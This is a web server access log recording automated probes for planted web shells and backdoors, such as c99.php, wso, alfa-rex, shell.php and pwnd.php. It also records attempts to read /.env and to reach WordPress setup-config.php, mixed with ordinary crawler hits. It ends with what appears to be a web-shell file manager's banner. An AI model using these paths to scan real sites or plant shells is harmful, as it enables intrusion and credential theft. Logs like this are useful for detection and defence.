172.207.158.210 - - [05/Aug/2025:15:50:27 -0400] "GET /berlin.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:28 -0400] "GET /minik.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:29 -0400] "GET /wp-content/BypassBest.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:29 -0400] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:30 -0400] "GET /sym403.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:30 -0400] "GET /wp-blog.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:31 -0400] "GET /composer.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:32 -0400] "GET /po.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:32 -0400] "GET /info.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:33 -0400] "GET /goods.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:34 -0400] "GET /moon.php?p= HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:34 -0400] "GET /file.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:35 -0400] "GET /system_log.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:36 -0400] "GET /mail.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:37 -0400] "GET /wp-includes/Requests/Cookie/alfa-rex.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:38 -0400] "GET /lock.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:38 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:39 -0400] "GET /wp-includes/fonts/about.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:40 -0400] "GET /v.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:40 -0400] "GET /wp-content/uploads/bootstrap.inc.php HTTP/1.1" 301 795 "-" "-"
216.244.66.236 - - [05/Aug/2025:15:44:15 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
4.197.236.174 - - [05/Aug/2025:15:47:17 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:21 -0400] "GET /css.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:23 -0400] "GET /updates.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:24 -0400] "GET /shell.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:25 -0400] "GET /moon.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:26 -0400] "GET /avaa.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:26 -0400] "GET /13.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:27 -0400] "GET /fm.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:28 -0400] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:28 -0400] "GET /radio.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:29 -0400] "GET /404.shtml HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:30 -0400] "GET /link.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:31 -0400] "GET /fw.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:32 -0400] "GET /ws.php7 HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:33 -0400] "GET /index.php HTTP/1.1" 301 795 "-" "-"
4.197.236.174 - - [05/Aug/2025:15:47:35 -0400] "GET /log.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:15 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:17 -0400] "GET /wp-admin/maint/index.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:17 -0400] "GET /wp-admin/maint/maint.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:19 -0400] "GET /admin1.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:21 -0400] "GET /function/function.php?p= HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:21 -0400] "GET /worksec.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:22 -0400] "GET /f.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:22 -0400] "GET /uploads/form3.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:23 -0400] "GET /wp-crom.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:23 -0400] "GET /uploads/multi.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:25 -0400] "GET /update/nf.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:27 -0400] "GET /avaa.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:28 -0400] "GET /update/f35.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:29 -0400] "GET /byp.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:31 -0400] "GET /eror.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:33 -0400] "GET /atomlib.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:35 -0400] "GET /lv.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:36 -0400] "GET /lock360.php?p= HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:36 -0400] "GET /usage-file.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:37 -0400] "GET /wp-admin/images/wp-signup.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:39 -0400] "GET /es.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:41 -0400] "GET /images/m.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:41 -0400] "GET /images/c99.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:42 -0400] "GET /wp-includes/compats.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:43 -0400] "GET /wp-admin/images/wp-ksv1i.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:44 -0400] "GET /images/footer.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:44 -0400] "GET /wp-includes/block-editor.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:45 -0400] "GET /wp-content/upgrade/file.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:46 -0400] "GET /wp-content/uploads/about.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:46 -0400] "GET /.well-known/zaza.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:47 -0400] "GET /images/sendme.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:47 -0400] "GET /wp-admin/images/singlep.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:49 -0400] "GET /wp-content/themes/jaida/lang.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:50 -0400] "GET /wp-includes/widgets//include.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:52 -0400] "GET /img/5/radio.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:53 -0400] "GET /wp-includes/sim.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:54 -0400] "GET /wp-content/plugins/edaewni/index.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:54 -0400] "GET /wso-x569.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:56 -0400] "GET /wp-includes//wp-includes/atomlib.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:57 -0400] "GET /assets/js/wp-config.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:58 -0400] "GET /wp-admin/maint/item.php HTTP/1.1" 301 795 "-" "-"
196.251.84.117 - - [05/Aug/2025:15:51:33 -0400] "GET /.env HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
66.249.65.73 - - [05/Aug/2025:15:54:27 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.134.172.118 - - [05/Aug/2025:15:55:21 -0400] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:22 -0400] "HEAD /bc HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:22 -0400] "HEAD /bk HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:22 -0400] "HEAD /old HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.207.158.210 - - [05/Aug/2025:15:50:41 -0400] "GET /images/photo.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:42 -0400] "GET /wp-admin/maint/Mailer.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:43 -0400] "GET /wp-includes/Text/Diff/Engine.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:45 -0400] "GET /wp-admin/js/themes.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:48 -0400] "GET /wp-admin/includes/nav.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:48 -0400] "GET /wp-includes/rk2.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:48 -0400] "GET /.well-known/zaza.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:49 -0400] "GET /images/Marvins.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:50 -0400] "GET /ee.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:51 -0400] "GET /terminal.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:51 -0400] "GET /chosen.php?p= HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:52 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:54 -0400] "GET /hi.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:55 -0400] "GET /wp-includes/pomo/secure.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:55 -0400] "GET /.well-known/acme-challenge/LA.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:56 -0400] "GET /vendor/nikic/php-parser/parser.php HTTP/1.1" 301 795 "-" "-"
172.207.158.210 - - [05/Aug/2025:15:50:57 -0400] "GET /2.php HTTP/1.1" 301 795 "-" "-"
66.249.65.74 - - [05/Aug/2025:15:54:28 -0400] "GET /ads.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.134.172.118 - - [05/Aug/2025:15:55:21 -0400] "HEAD /wordpress HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:21 -0400] "HEAD /wp HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:22 -0400] "HEAD /backup HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:22 -0400] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:22 -0400] "HEAD /main HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.134.172.118 - - [05/Aug/2025:15:55:23 -0400] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
52.230.71.124 - - [05/Aug/2025:16:02:48 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:49 -0400] "GET /t.php7 HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:50 -0400] "GET /about.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:51 -0400] "GET /bless.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:52 -0400] "GET /updates.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:53 -0400] "GET /filemanager.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:53 -0400] "GET /shell.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:54 -0400] "GET /avaa.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:56 -0400] "GET /admin.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:57 -0400] "GET /radio.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:02 -0400] "GET /log.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:03 -0400] "GET /byp.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:51 -0400] "GET /css.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:52 -0400] "GET /goat1.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:54 -0400] "GET /moon.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:55 -0400] "GET /13.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:56 -0400] "GET /fm.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:57 -0400] "GET /404.shtml HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:58 -0400] "GET /berlin.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:58 -0400] "GET /link.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:02:59 -0400] "GET /file.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:00 -0400] "GET /fw.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:00 -0400] "GET /ws.php7 HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:01 -0400] "GET /index.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:02 -0400] "GET /ben.php HTTP/1.1" 301 795 "-" "-"
52.230.71.124 - - [05/Aug/2025:16:03:03 -0400] "GET /chosen.php HTTP/1.1" 301 795 "-" "-"
194.145.227.125 - - [05/Aug/2025:16:18:57 -0400] "GET /wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php HTTP/1.1" 301 795 "-" "ALittle Client"
43.159.136.201 - - [05/Aug/2025:16:22:35 -0400] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
23.21.179.120 - - [05/Aug/2025:16:27:18 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
2a06:98c0:3600::103 - - [05/Aug/2025:16:27:37 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
216.244.66.236 - - [05/Aug/2025:16:29:02 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [05/Aug/2025:16:23:19 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
2a06:98c0:3600::103 - - [05/Aug/2025:16:27:07 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
54.209.100.30 - - [05/Aug/2025:16:27:19 -0400] "GET /index HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.244.66.236 - - [05/Aug/2025:16:29:02 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
2a06:98c0:3600::103 - - [05/Aug/2025:16:30:01 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [05/Aug/2025:16:30:11 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
196.251.73.163 - - [05/Aug/2025:16:44:01 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.73.163 - - [05/Aug/2025:16:44:59 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.73.163 - - [05/Aug/2025:16:45:35 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
47.128.31.255 - - [05/Aug/2025:16:45:44 -0400] "GET /robots.txt HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.73.163 - - [05/Aug/2025:16:45:46 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.73.163 - - [05/Aug/2025:16:45:53 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
52.54.95.127 - - [05/Aug/2025:16:48:13 -0400] "GET /news_detaill?id=23 HTTP/1.1" 301 795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
196.251.73.163 - - [05/Aug/2025:16:45:21 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"

Youez - 2016 - github.com/yon3zu
LinuXploit